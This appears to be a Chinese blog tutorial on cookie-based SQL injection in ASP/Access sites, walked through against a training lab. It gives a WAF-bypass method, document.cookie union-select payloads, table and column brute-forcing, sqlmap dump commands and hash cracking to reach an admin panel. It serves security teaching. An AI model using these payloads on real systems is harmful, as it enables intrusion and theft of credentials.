Access注入之Cookie注入

Cookie注入简介

注:Cookie传参值需要URL编码

什么是Cookie

Cookie 是指某些网站为了 辨别用户身份 而储存在 用户本地终端上的数据(通常经过 加密 )。

通俗来讲,Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号

Cookie 的出现是为了给用户更好的 体验性 ,从安全的角度来讲,Cookie本身就是不安全的。

Cookie注入原理

在动态脚本语言中存在 超全局变量 可以 获取多种传参方式 (基本上)

很多时候开发在开发的时候为了考虑到多种接受参数,在接受参数的时候都是用多种解释传参的方法

例如:

php中的 $_REQUEST[] 可以获取 POST|GET|COOKIE 传参  

注:php 5.4以上版本就不会接受Cookie传参了。

如果说开发用了 $_REQUEST[] 来接受参数?

然后我们的 POST 和 GET 传参被Waf拦截了,然后也许Waf没有对Cookie进行检测,

我们尝试用 Cooki e进行传参,就可以绕过检测机制!!

注:Cookie注入是 特殊的传参方式 产生的注入,与其他的无关!!

修改或设置Cookie

Burp抓包

在有 Cookie 请求头的 数据包 里面直接修改Cookie,没有 Cookie 请求头的 数据包 里面直接添加Cookie

1629800847_6124c98fb26f212c2b71b.png!small?1629800847726

浏览器设置

按F12打开开发者模式——》Application ——》storage——》cookies

然后修改Cookie

1629802004_6124ce14eee128adba18c.png!small?1629802004731

浏览器自带JS设置

按 F12 并选择 Console打开浏览器控制台

然后用 document.cookie来设置

1629804690_6124d892c8ebd38e5d5d4.png!small?1629804690357

escape( )是对参数进行一次 URL 编码的函数。

浏览器插件设置

EditThisCookie,ModHeader,HackBar等插件都可以设置

这里主要说的是 EditThisCookie 设置cookie

1629811465_6124f30936fe74f16f1ac.png!small?1629811464707

什么站点存在注入

一般来说:

ASP站点存在的可能性很高;(判断网站站点的一般方法:看URL 或 抓 返回包)

PHP的版本小于5.3的可能性很高;

Cookie注入实战

手工注

1.判断注入点

正常输入 and -1=-1 发现关键字 and 被过滤了

1629812062_6124f55e290022aa1a113.png!small?1629812061598

然后尝试是否可以 cookie 注入

document.cookie="id="+escape("171 and -1=-1")  页面显示正常

document.cookie="id="+escape("171 and -1=-2")  页面显示正常

1629814117_6124fd65abc247908974a.png!small?1629814117279

====》可以进行cookie注入

2. 判断当前页面字段总数

document.cookie="id="+escape("171 and -1=-1 order by 10")   页面有显示

document.cookie="id="+escape("171 and -1=-1 order by 11")  页面没有显示

1629815743_612503bfc37f61a8f19b6.png!small?1629815743292

====》字段数为 10。

3.爆破表名

因为改数据库是 Access数据库,只有一个数据库,没有系统自带表,要用标准的查询语句才能查询到数据,所以要先知道这里的 表名和字段名 。对于获取access数据库的表名和字段名,方法只有爆破。

exists( ) : 这个函数就是用来检查表名是否存在,原理就是检查子查询能否查询到数据

常见的表名:admin news work user job admin_user

document.cookie="id="+escape("171 and  exists(select *from admin) ")  页面正常显示

1629820613_612516c5503df058a79eb.png!small?1629820612769

====》存在 admin 表。

也可以在Burp用字典爆破。

选中要爆破的位置

1629857738_6125a7cacab2c7547a86e.png!small?1629857738172

1629857732_6125a7c44cc346e446ffe.png!small?1629857731617

开始爆破

1629858022_6125a8e6d8cea9da4ace0.png!small?1629858025807

====》表名有 admin,news,user,product,feedback...

4.判断显示位

document.cookie="id="+escape("171 and -1=-2 union select 1,2,3,4,5,6,7,8,9,10 from admin")

1629858283_6125a9eb7e8158379836a.png!small?1629858282951

====》显示位为2,3,7,8,9

5.爆破字段名

在显示位跑字段名

常见字段名:id,user,flag,password,username,title........

document.cookie="id="+escape("171 and -1=-2 union select 1,id,3,4,5,6,7,8,9,10 from admin")  有数据显示

document.cookie="id="+escape("171 and -1=-2 union select 1,password,3,4,5,6,7,8,9,10 from admin")  有数据显示

1629859775_6125afbf11a0b6149f396.png!small?1629859774368

====》得到数据:b9a2a2b5dffb918c

也可以用Burp字典爆破。

1629860148_6125b1349200523d2e04d.png!small?1629860147779

1629860158_6125b13eec7640c99c4d0.png!small?1629860158232

====》得到字段名 id,password,username,id,flag....

6.御剑后台扫描

1629860447_6125b25f7c297f800fad4.png!small?1629860446769

得到 企业网站管理系统

1629860600_6125b2f8dc11edcd4ea2c.png!small?1629860600132

管理员账号 admin

然后将 b9a2a2b5dffb918c进行cmd5解码得到 管理员后台密码welcome

进入后台拿到flag

1629860894_6125b41ed9355cdafb2fc.png!small?1629860894034

sqlmap跑cookie注入

python sqlmap.py -u http://kypt8004.ia.aqlab.cn/shownews.asp --cookie "id=171" --level 2

python sqlmap.py -u http://kypt8004.ia.aqlab.cn/shownews.asp --cookie "id=171" --level 2 --tables

1629861580_6125b6cc885004055a3cd.png!small?1629861579759

python sqlmap.py -u http://kypt8004.ia.aqlab.cn/shownews.asp --cookie "id=171" --level 2 -T admin --dump

1629861737_6125b769266d07a6498d7.png!small?1629861736306

得到数据 b9a2a2b5dffb918c。

后面的和上面一样.........

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取

 读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

同时每个成长路线对应的板块都有配套的视频提供: 

大厂面试题

视频配套资料&国内外网安书籍、文档

当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~ 

  读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

特别声明:

此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。

  • 40
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值